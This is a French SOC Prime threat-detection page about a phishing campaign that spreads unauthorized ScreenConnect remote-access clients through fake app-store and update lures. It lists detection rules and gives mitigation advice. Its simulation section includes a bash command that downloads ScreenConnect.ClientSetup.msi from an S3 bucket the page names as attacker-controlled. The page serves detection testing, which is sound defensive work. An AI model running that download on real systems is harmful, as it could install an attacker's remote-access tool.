SOC Prime Bias: Élevé

11 Aug 2026 06:17 UTC

Propagation de ScreenConnect à grande échelle via le phishing thématique de l’App Store

Author Photo
SOC Prime Team linkedin icon Suivre
Propagation de ScreenConnect à grande échelle via le phishing thématique de l’App Store
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Résumé

Une campagne de phishing à grande échelle utilise des techniques avancées d’ingénierie sociale pour déployer des clients ConnectWise ScreenConnect non autorisés. Les attaquants se font passer pour des services de confiance tels que le Microsoft Store, Apple App Store et Google Meet à travers des contenus web dynamiques et de fausses notifications de mise à jour. Une fois installée, le logiciel RMM donne aux acteurs malveillants un accès à distance persistant aux systèmes compromis.

Enquête

L’équipe LevelBlue OpsCTI a découvert la campagne en étudiant un cadre de phishing imitant des mises à jour et réutilisant une infrastructure. Les chercheurs ont identifié des structures de répertoires cohérentes, des empreintes de ressources HTTP récurrentes, et des scripts assistés par IA utilisés pour profiler les victimes potentielles. L’enquête a également révélé l’exploitation des API Telegram Bot pour la télémétrie en temps réel et le rapport d’infection.

Atténuation

Les organisations devraient prioriser la détection de logiciels RMM non autorisés et surveiller les téléchargements exécutables provenant de services cloud publics inconnus tels qu’Amazon S3 ou Cloudflare R2. Des contrôles pour identifier l’usurpation de marque et le trafic API Bot Telegram non autorisé sont également recommandés. Des examens réguliers de l’inventaire des postes de travail peuvent aider à découvrir des installations ScreenConnect non conformes et des compromis existants.

Réponse

Si un compromis est suspecté, les systèmes concernés doivent être immédiatement isolés et tout client ScreenConnect communiquant avec des instances de relais non autorisées doit être investigué. Les journaux réseau doivent être examinés pour détecter des connexions suspectes avec des domaines de phishing connus ou des points de stockage cloud publics. Les intervenants doivent également examiner les processus lancés par msiexec.exe ou PowerShell qui téléchargent des fichiers depuis des sources externes.

Flux d’Attaque

Détections

Possibilité d’Exécution via des Lignes de Commande PowerShell Cachées (via cmdline)

Équipe SOC Prime
10 août 2026

Appel de Méthodes .NET Suspectes depuis PowerShell (via powershell)

Équipe SOC Prime
10 août 2026

Msiexec Possible Exécutant des Fichiers dans un Répertoire Inhabituel (via cmdline)

Équipe SOC Prime
10 août 2026

Logiciel de Gestion / Accès à Distance Alternatif (via process_creation)

Équipe SOC Prime
10 août 2026

Possible Abus de Domaine de Développement Cloudflare (via dns)

Équipe SOC Prime
10 août 2026

Commandement et Contrôle Suspect par Requête DNS de Domaine de Premier Niveau (TLD) Inhabituel (via dns)

Équipe SOC Prime
10 août 2026

IOC (HashSha256) à détecter : Au-delà des ‘Fausses Mises à jour’ : Du Phishing Thématique Application Store à la Distribution à Grande Échelle de ScreenConnect

Règles AI SOC Prime
10 août 2026

IOC (SourceIP) à détecter : Au-delà des ‘Fausses Mises à jour’ : Du Phishing Thématique Application Store à la Distribution à Grande Échelle de ScreenConnect

Règles AI SOC Prime
10 août 2026

IOC (DestinationIP) à détecter : Au-delà des ‘Fausses Mises à jour’ : Du Phishing Thématique Application Store à la Distribution à Grande Échelle de ScreenConnect

Règles AI SOC Prime
10 août 2026

Exécution de l’Installation Non Autorisée de ScreenConnect via Phishing [Création de Processus Windows]

Règles AI SOC Prime
10 août 2026

Détecter le Téléchargement de l’Installateur ScreenConnect depuis des Buckets S3 Suspects [Traînée Cloud AWS]

Règles AI SOC Prime
10 août 2026

Exécution de Simulation

Prérequis : La Vérification de Pré-Vol pour la Télémétrie & Baseline doit avoir réussi.

Raisonnement : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTP identifiés et viser à générer la télémétrie exacte attendue par la logique de détection. Des exemples abstraits ou non liés entraîneront un mauvais diagnostic.

  • Narrative d’Attaque & Commandes : Un attaquant a établi une campagne de phishing. Pour éviter la détection par des antivirus basés sur les fichiers, il héberge un outil d’accès à distance légitime (ScreenConnect) dans un bucket AWS S3 public qui imite la distribution légitime de logiciels. L’attaquant incite une victime à télécharger l’installateur. Cette action déclenche un événement GetObject dans AWS CloudTrail, ciblant le bucket malveillant spécifique eobtdk.s3.us-east-2.amazonaws.com eobtdk.s3.us-east-2.amazonaws.com et le nom de fichier spécifique ScreenConnect.ClientSetup.msi.

  • Script de Test de Régression : [Note: Since we cannot interact with real malicious buckets, this script simulates the requête qui générerait l’entrée de journal si le bucket existait.]

    #!/bin/bash
    # Script de simulation pour déclencher la règle de détection de CloudTrail
    # Cela imite l'appel API qu'un adversaire ferait pour télécharger l'outil
    
    echo "[+] Début de la Simulation : Téléchargement de ScreenConnect depuis un S3 Malveillant..."
    
    # Nous utilisons l'AWS CLI pour tenter une requête GET. 
    # Même si le bucket n'existe pas, la tentative de 'requête' génère l'événement CloudTrail 
    # dans un environnement réel où le bucket est configuré.
    
    aws s3 cp s3://eobtdk/ScreenConnect.ClientSetup.msi . --region us-east-2
    
    echo "[+] Commande de simulation envoyée. Vérifiez CloudTrail pour les événements GetObject ciblant 'eobtdk.s3.us-east-2.amazonaws.com'."
  • Commandes de Nettoyage :

    # Supprimer les fichiers téléchargés pendant la simulation
    rm -f ScreenConnect.ClientSetup.msi